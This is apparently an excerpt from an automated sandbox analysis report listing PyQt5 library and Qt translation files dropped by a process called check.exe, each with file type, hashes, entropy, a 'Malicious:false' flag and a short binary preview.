                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o...o...o...f...k......m...{..m......~......h......m......h...o..........k......n.....~.n......n...Richo...........................PE..d...V._.........." .....z...t......T........................................@.......b....`......................................... ................ ..X....................0..4.......T.......................(...p...0...............x............................text....y.......z.................. ..`.rdata...Z.......\...~..............@..@.data...............................@....pdata..............................@..@.qtmetad............................@..P.rsrc...X.... ......................@..@.reloc..4....0......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):144368
                                                                                                                                                                                                                                      Entropy (8bit):6.294675868932723
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:rrjwZ43rCOtrBk7wcR0l7wBlaL6BtIEt51T0Nhkqg8FoQY:7hZu9R0l7wFBtIEt51T0Nuqg8JY
                                                                                                                                                                                                                                      MD5:53A85F51054B7D58D8AD7C36975ACB96
                                                                                                                                                                                                                                      SHA1:893A757CA01472A96FB913D436AA9F8CFB2A297F
                                                                                                                                                                                                                                      SHA-256:D9B21182952682FE7BA63AF1DF24E23ACE592C35B3F31ECEEF9F0EABEB5881B9
                                                                                                                                                                                                                                      SHA-512:35957964213B41F1F21B860B03458404FBF11DAF03D102FBEA8C2B2F249050CEFBB348EDC3F22D8ECC3CB8ABFDC44215C2DC9DA029B4F93A7F40197BD0C16960
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R._...1]..1]..1]..]..1]..0\..1]..5\..1]..2\..1]..4\..1]..0\..1]..0\..1]..0]..1]..4\..1]..1\..1]...]..1]..3\..1]Rich..1]........................PE..d...`._.........." .....\...........`.......................................`......wJ....`................................................. ........@..X.... ...............P.........T...................`...(...0...0............p...............................text....Z.......\.................. ..`.rdata......p.......`..............@..@.data...............................@....pdata....... ......................@..@.qtmetadm....0......................@..P.rsrc...X....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_ar.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):130
                                                                                                                                                                                                                                      Entropy (8bit):4.024232093209084
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/2/vlAlHekW3/S1MUe3/CLlI+rwtbWlMrNtYs8ar/u:Cwm+/PtUePCRIRt6Ygs8y/u
                                                                                                                                                                                                                                      MD5:8FF05B56C0995F90A80B7064AA6E915C
                                                                                                                                                                                                                                      SHA1:D5AEB09AE557CEEFB758972EC4AC624CDDC9E6A7
                                                                                                                                                                                                                                      SHA-256:A8A1B0D6F958E7366D1C856BE61000106D3E7FC993FB931675369892B9002D0B
                                                                                                                                                                                                                                      SHA-512:5374E0F1D3F5A6A456B00732DE8005787B17ECEF9C8A2B2C1228966A6A8DE211700334D8FD789DAD269F52D0AEED3F5160010CA60909861E270C253B3EA881A4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ar....R.....q.t.b.a.s.e._.a.r.....q.t.s.c.r.i.p.t._.a.r.....q.t.m.u.l.t.i.m.e.d.i.a._.a.r..............$...*.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_bg.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6813848812976975
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/6lLlAlHekVYtzlY1MUdI7lULlI+rwtbWlMoIFl8IPldkO4t/z:CwDC+7tJjUWhURIRt68f8oiP1z
                                                                                                                                                                                                                                      MD5:466EED6C184D2055488D4C5EA9AE5F20
                                                                                                                                                                                                                                      SHA1:8599AB9B731BFC84F6EEC7A0129F396FB8FEC4EA
                                                                                                                                                                                                                                      SHA-256:9E1CE4D91852352043D9191F1A992838F919CBA7E2F2D9BB1161E494E8BF5F5E
                                                                                                                                                                                                                                      SHA-512:D2462951EC7DCE3D0851AE9C4ED644FFE0D2A5BDD15B4AE1A4295C187B4295BC854D6A5038DAC0564D165463419D615EB6CE7A9760CEFAD71AB673FB2109C349
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......bg....v.....q.t.b.a.s.e._.b.g.....q.t.s.c.r.i.p.t._.b.g.....q.t.m.u.l.t.i.m.e.d.i.a._.b.g... .q.t.x.m.l.p.a.t.t.e.r.n.s._.b.g.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_ca.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.631479835393124
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/NVl/lAlHekUOplY1MUce/hlAlI+rwtbWlMpOflUlIPldkOHlz:CwO4+94jUcerAIRt6a6Uloi8
                                                                                                                                                                                                                                      MD5:6FBA66FE449866B478A2EBA66A724A02
                                                                                                                                                                                                                                      SHA1:EBEF6ED8460218CE8DF735659A8CBCD693600AC6
                                                                                                                                                                                                                                      SHA-256:171C7424B24D8502AB53CB3784FF34D8FCFAE26557CF8AF4DFDDEC6485ACC2FE
                                                                                                                                                                                                                                      SHA-512:2D2438738C6D10D8A53B46DE5A94BBF993818D080F344D9F1B94FC83D60335D9A5E8EFCC297D593FFF1D427972F9F9502FC31C332CAEA579FC7A88487390457E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ca....v.....q.t.b.a.s.e._.c.a.....q.t.s.c.r.i.p.t._.c.a.....q.t.m.u.l.t.i.m.e.d.i.a._.c.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.a.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_cs.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):157
                                                                                                                                                                                                                                      Entropy (8bit):3.7483537099309427
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/fVFlAlHekUsplY1MUcM/hlULlI+rwtbWlMpsfl8IPldkO1lPchn:CwY4+9ujUcMrURIRt6aE8oinh
                                                                                                                                                                                                                                      MD5:D033053C03C3ECFA2AA926E0E674F67F
                                                                                                                                                                                                                                      SHA1:B4E95F8278121E2549F8BB6B5DAF1496F1738A7D
                                                                                                                                                                                                                                      SHA-256:3C0CBFD19490D67D1B3B9E944C3A4D9A9E7F87D7AE35E88D5D5A0077349B5B21
                                                                                                                                                                                                                                      SHA-512:2C7E9E9DBE0B25FBA94A52FE4BCCB1D9FED2A7BD2877DB91F82546C3BC8606280949594227BA0FC1C74C31010E1F573B3A82852BE746EAA4F397140485789136
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......cs....v.....q.t.b.a.s.e._.c.s.....q.t.s.c.r.i.p.t._.c.s.....q.t.m.u.l.t.i.m.e.d.i.a._.c.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.s...........

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_da.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/4Jlr/lAlHekT6hY1MUb6JAlI+rwtbWlMuel3UlIPldkOQtt:Cw7rC+3jUkAIRt6EVUloi9
                                                                                                                                                                                                                                      MD5:E6A683F4A0883B5B0C7D30B847EF208C
                                                                                                                                                                                                                                      SHA1:FF2440DBBFE04AD86C6F285426AAFD49A895B128
                                                                                                                                                                                                                                      SHA-256:B5036161CE808C728E5FDA985F792DB565831FD01CF00B282547790C037353A2
                                                                                                                                                                                                                                      SHA-512:D73B794A71DFD3A3C06BF43ED109F635B4960F9A3904FB728873AB5251BDF6A791DDFDEBA884A2703A35461E18BA902804095AC4B92A2C9361526469B6D35FFA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......da....v.....q.t.b.a.s.e._.d.a.....q.t.s.c.r.i.p.t._.d.a.....q.t.m.u.l.t.i.m.e.d.i.a._.d.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.a.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_de.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/8rJFlAlHekTul01MUbul4LlI+rwtbWlMuallyIPldkOknt:Cw/rJ4+XU5RIRt6Aaoi7t
                                                                                                                                                                                                                                      MD5:06168E1261BF72F49F94927723B2E1EB
                                                                                                                                                                                                                                      SHA1:DEAF1B53C3FEE6CB28840418D0060AFA4D59D3FC
                                                                                                                                                                                                                                      SHA-256:5805B8FF3747849794E2D70661D737C69C15F1AE763C38E17084B1E5A81E9153
                                                                                                                                                                                                                                      SHA-512:AA3915C029C74DC270514C7F50E8BEC06C825F278E0DE0477AD8ED3187700BBD7711382A6E47C3AC76AC756CEFF9FA8CDD4E9B9DAC817475BC122F78B02C7D7D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......de....v.....q.t.b.a.s.e._.d.e.....q.t.s.c.r.i.p.t._.d.e.....q.t.m.u.l.t.i.m.e.d.i.a._.d.e... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.e.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_en.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                                                      MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                                                      SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                                                      SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                                                      SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`...

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_es.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6070658648473097
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/7lJFlAlHekSMthULlI+rwtbWlMvEJY1MUaEf8IPldkOzvt:CwElJ4+7MrURIRt6cujUaE8oi0F
                                                                                                                                                                                                                                      MD5:EE47DFADBA4414FDC051C5CFBE71DDC1
                                                                                                                                                                                                                                      SHA1:DE650E96A9C130D35F8A498202773EF7FC875D27
                                                                                                                                                                                                                                      SHA-256:E25E43F046F61022FFE871A2F73C6A12EDFC5C3EFD958C0E019A721860A053B0
                                                                                                                                                                                                                                      SHA-512:8C1D8901D2F66CCBF947B831858E08B703517470B2B813B241E00162A275AC9103FF5B9251AD39BD53551E0A4FB45EE74187B218A1EF7C6CF6C5FA9F9219AE04
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......es....v.....q.t.b.a.s.e._.e.s.....q.t.m.u.l.t.i.m.e.d.i.a._.e.s.....q.t.s.c.r.i.p.t._.e.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.e.s.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_fa.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):293121
                                                                                                                                                                                                                                      Entropy (8bit):5.272179385890926
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:gEo2cQbzaVmvGQYkHkMRKkNeGr+0BhaRsLAChY21rpnLqL9ytnvC58gypn4l4qF:gEZbza0HjeGrxBhaCLFC
                                                                                                                                                                                                                                      MD5:F9C3624197ACB30A9E6CC799BB65BED6
                                                                                                                                                                                                                                      SHA1:D715EAE24387DE15588F68C92991A93FAFB5EEAB
                                                                                                                                                                                                                                      SHA-256:B292AFB0763B8C7C30A5AF7372BFC12D8A0D00BF3DD4A000715D9F576D9C1A39
                                                                                                                                                                                                                                      SHA-512:199C107AE7EAFCF2A5EEC149CAFEE7ED09B938E204B56AD3AAC9568D27166F61EC8E2225A11AF26F7E1F035FB5CAD98621A01E8A9942D18C273F43B90201162A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......faB..I....*...u...+...............@.......A...J...B.......C...X...D.......E.......F...%...G.......H...0...I.......P...v...Q.......R.......S.......T..."...U.......V...h...W.......X...s...Y.......]..e....t...................-.......W.......|.......i...;..Eu...;..Z....;...]...;..c....;.......;..0]...M..f....O.......O..2.......#....}..f=...m..fg.........(5......+;..1a..+;...V..+;...!..+O..17..+O...(..1.......E@......F....u..H4......HY...Y..H....S..I....5..I@.....IA......IC......J...1...J.......J.......J...|...K...6...LD......L.......PS......R....Z..T.......Zr.. ...[`...O..[`......\...%@..\...2..._...&l.._...38..1........E..........2u..........1.......1...........@......4G...........................$...L...$..xY...[.......,...u...y...y...y..z.......F.......<.......g.......5W...........9...........f...E...U...E../....E..................0-...%..6....%.........................3......f..........5...?...0..EK...0......0..L ...0..c....0.......0...Z...5...........Y.. D

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_fi.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):117
                                                                                                                                                                                                                                      Entropy (8bit):3.739162292019161
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/4HlAlHekRgOp1MUZWJKlI+rwtbWlMsIkk:Cwxe++IUocIRt6Qkk
                                                                                                                                                                                                                                      MD5:72882942B07B8AAC98034016E752B1A0
                                                                                                                                                                                                                                      SHA1:BF23B4C136B863B10E770019A2DF62FC988859DF
                                                                                                                                                                                                                                      SHA-256:048CA42DCE4FAF5FC21D843576E3C6FD963146ECC78554E7E5F34D07F64FB213
                                                                                                                                                                                                                                      SHA-512:403E7F4E9A0E44F2118804F0781A18EB1852797825498751E3AFA02D9558D90293ABDB570786CED80F7EFF800BEF6D9444A72E6A640D331DA46B2A0EA43C8E96
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fi....R.....q.t.b.a.s.e._.f.i.....q.t.s.c.r.i.p.t._.f.i.....q.t.m.u.l.t.i.m.e.d.i.a._.f.i.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_fr.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.680458675741643
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/FjlAlHekRL21MUZNJOLlI+rwtbWlMs9KIPldkORT:Cw3+SU0RIRt6koio
                                                                                                                                                                                                                                      MD5:3C45C665CFE036A7474CB4DCBB13CF40
                                                                                                                                                                                                                                      SHA1:62312DFF3C4CD38BAE8456C981601D0D89600F63
                                                                                                                                                                                                                                      SHA-256:8624033D849E670B12C9532337FCBF260F20848E044FEE7787CFE2AC92BE28DB
                                                                                                                                                                                                                                      SHA-512:21659AA452BC2493D915F0BE94F90CDD57759B1F1306AAA2836058D41E80DED24742EBD74E19420021514A6AB4150CA0B447574E96B9D3BF0BC5A8C78DAAF7AC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fr....v.....q.t.b.a.s.e._.f.r.....q.t.s.c.r.i.p.t._.f.r.....q.t.m.u.l.t.i.m.e.d.i.a._.f.r... .q.t.x.m.l.p.a.t.t.e.r.n.s._.f.r.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_gd.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):70
                                                                                                                                                                                                                                      Entropy (8bit):4.463523104731333
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/EXlAlHekQrEuknbJB:CwjO+5JY
                                                                                                                                                                                                                                      MD5:A8D55457C0413893F746D40B637F9C93
                                                                                                                                                                                                                                      SHA1:25123615482947772176E055E4A74043B2FBCAA0
                                                                                                                                                                                                                                      SHA-256:49DF855A004A17950338AF3146466F6DF4D5852410BD0B58EA80E0D0203A9D24
                                                                                                                                                                                                                                      SHA-512:99718B948D94B292BDEDF6B247A5856BC7AC78408FCC41C980F264C2C8565125786F0289F5F993DCF11B8CDA3AFB2A1D8634B1D0BC9B34992F538F8E4086EC00
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......gd..........q.t.b.a.s.e._.g.d....................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_gl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):323590
                                                                                                                                                                                                                                      Entropy (8bit):4.568068046062524
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:OYSG8zxWSDjq73Pf6FT1f4uh50QGrRfFD54YyUY0Ou4/tnra3Z0uYhB5YHfHRRn2:O39WSD3TMQGrxFD5EUVQ
                                                                                                                                                                                                                                      MD5:0661FFABFBC50187F3BA38876B721946
                                                                                                                                                                                                                                      SHA1:EB5E7205355CFC6BCB4DF27E224079842C97B296
                                                                                                                                                                                                                                      SHA-256:204A01AC7DEB6B5BAE193AFECBD1E50D18C73BF7D94BADEB2BBFDF6123C4ED93
                                                                                                                                                                                                                                      SHA-512:65AB66CC54D65E7678FA731A5C5F2CC9D6FC217B91AD47D538440811E09A23E49CD95CE62A79E3E8C275E250AC1A0B54BD289F6DD067573876DA7AFF54381D02
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......gl_ESB..I....*.......+..&............@.......A...z...B.......C...p...D.......E......F...!...G......H.......I......P...@...Q.......R......S...5...T......U...+...V.......W...a...X.......Y...N...]..o....t..,................F.......p..............4....;..LI...;..bD...;.......;.......;.......;..cJ...M..o1...O..G....O..e.......U....}..oY...m..o........D..(5...X..+;..6/..+;...~..+;......+O..6...+O...N..1......E@...?..F.......H4..'...HY......H...3`..I......I@......IA......IC..0...J...P...J...1...J...0...J.......K...:...LD..2...L...3...PS..:A..R... d..T.......Zr..Rd..[`......[`.....\...WK..\...RR.._...X..._...f...1........E...{......7M..........1.......1....q......O.......9...............*.......)....$... ...$.......[..,=...,..-....y..0X...y...~......Mx......]0.......H......:A......0....9...............E...o...E..b....E.........1.......c....%..;....%...;......3.......^......S................5..4Z...0..L....0.......0..n....0.......0..7....0.......5..9D......!g.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_he.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):83
                                                                                                                                                                                                                                      Entropy (8bit):3.880645689209568
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/YJ/dQlHekfaB21MUXmlvt:CwT0+D/UUt
                                                                                                                                                                                                                                      MD5:DD5C2C6B148F2DB3E666B859776AE129
                                                                                                                                                                                                                                      SHA1:8368F32039CC0776A1B95C9DED5FE6C9EA0D93FD
                                                                                                                                                                                                                                      SHA-256:C113D14E218D5402B616DABEA27969C6F83852676468C5EF051DDDEFB3EE0235
                                                                                                                                                                                                                                      SHA-512:2EAE33C8707407E083F6B8B05EA2C5B987646DF1553888C16D6508C5A33B2F758DDED73323622CD50324C96F51D61B7CE822F393551A30B211ABD3CC1367249F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......he....0.....q.t.b.a.s.e._.h.e.....q.t.s.c.r.i.p.t._.h.e.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_ar.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):8743
                                                                                                                                                                                                                                      Entropy (8bit):5.189558605179696
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:YUM7gBwnG4Vxj4nyn9aAMOJckrL6esm/0sQ5HeK1nvEB:YBkKnZxkyn9aAMWPsm/0sQsGvEB
                                                                                                                                                                                                                                      MD5:CCD39A7C8139AD041E31B3E5D40968B4
                                                                                                                                                                                                                                      SHA1:5751BE96817BB6AE7C9DA9F1FBA7F42F31CFCC5D
                                                                                                                                                                                                                                      SHA-256:222088C9752D1CC3BAB985EF2DC77E5AE78578DCE18A61EC15B39F02E588163D
                                                                                                                                                                                                                                      SHA-512:9844C0EC65EE1C76DBA021EAC6D476A85E6C8F5BBAF4150C1EA80C0A95BEDE67B5E8F981360EF8599FCECDFCBCB83BC0B8AC44DDEFDCD85F914318030E346967
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......arB.....(.....d.0T....*.5w......Uj....!.`.....M.a[............n..t..............39....&................B<s...V..M^...e......4.O5^...r..)^......o>...........?...t.....D ......k.N.....k.N...C...n...T...I...R..........2>.................|..G.......w....T.......l..........,................^............$a......6.>...........x..K......W.b....._Xn......GN...m..~......!.....J.K.H.............pN.............P.~.....o.....W..(.......~......s.>......%c.....o.....R.z.q..........................n.h................e.....i..........:.J.1. .E.3.E.Q.I..........Untitled.....QHelp.....8.*.9.0.Q.1. .F.3... .E.D.A.Q. .'.D.*.Q.,.E.J.9.).:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.......*.9.0.Q.1. .%.F.4.'.!. .'.D./.Q.D.J.D.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....>.*.9.0.Q.1. .%.F.4.'.!. .,./.'.H.D. .A.J. .'.D.E.D.A.Q. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....L.*.9.0.Q.1. .*.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_bg.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10599
                                                                                                                                                                                                                                      Entropy (8bit):5.192287379770591
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:jhYkcd7CYBdmfIOeX3byuJRoZXlBYnEpUYR+BJqO5X9pA2NNrxC0zwRK2nMY762A:a71DQIrLuVCnEtR+DquhN5xC0zwKPYHA
                                                                                                                                                                                                                                      MD5:5538049DA3A1D1D724AB6E11D2E2EDBE
                                                                                                                                                                                                                                      SHA1:7256BE390B88A053C0252488C443BE42F6F2D92A
                                                                                                                                                                                                                                      SHA-256:CBCDD1E0BBAE332D80DDB0A286056F17C824FA28D353D7FDF12FC97D9F6FE054
                                                                                                                                                                                                                                      SHA-512:DD98CAF3A016968EEDC9106C1839DDECC2D109E9E354708BD74B35E766C6A098C1680C0B867EAD9FCE2E2A6D683BE673B8E5DF1A1B2F1AAFDB31910FF833370F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
